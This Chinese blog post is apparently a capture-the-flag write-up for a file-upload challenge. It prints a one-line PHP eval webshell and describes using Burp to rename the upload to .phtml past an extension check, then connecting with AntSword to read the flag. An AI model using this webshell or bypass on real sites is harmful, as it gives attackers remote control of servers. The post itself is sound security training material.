BUUCTF:[ACTF2020 新生赛]Upload

本文描述了通过发现靶机的upload漏洞,如何上传PHP文件并通过Brup抓包修改文件格式,最终利用中国蚁剑连接终端获取flag的过程。作者展示了从漏洞利用到成功渗透的关键步骤。
摘要由CSDN通过智能技术生成

题目

  • 打开靶机
    找到文件上传的灯泡
  • 猜测是一个upload文件上传漏洞,那么我们的基本思路就是:上传一个php文件,phtml文件,在去用中国蚁剑来连接终端,查看里面的flag
  • 查看页面的checkfile函数
    checkflie
  • 我们直接上传文件只能采用.jpg|.png|.gif格式
  • 我们需要去Brup抓包,然后修改文件格式,在发送包
  • 首先写一个webshell.txt
<?php @eval($_POST['shell']);?>
  • 后缀修改为jpg,上传文件
    jpg
  • Brup抓包,修改为phtml,在发送包
    (这里试过php,会显示bad file)
    bad file
  • 修改为phtml,就好了!
    phtml
  • 并且得到了文件上传的地址
  • 中国蚁剑测试连接
    连接成功
  • 打开虚拟终端,寻找flag
flag{20a7f9e5-e489-4f91-840d-0fb7155bd2a7}

flag

  • 4
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值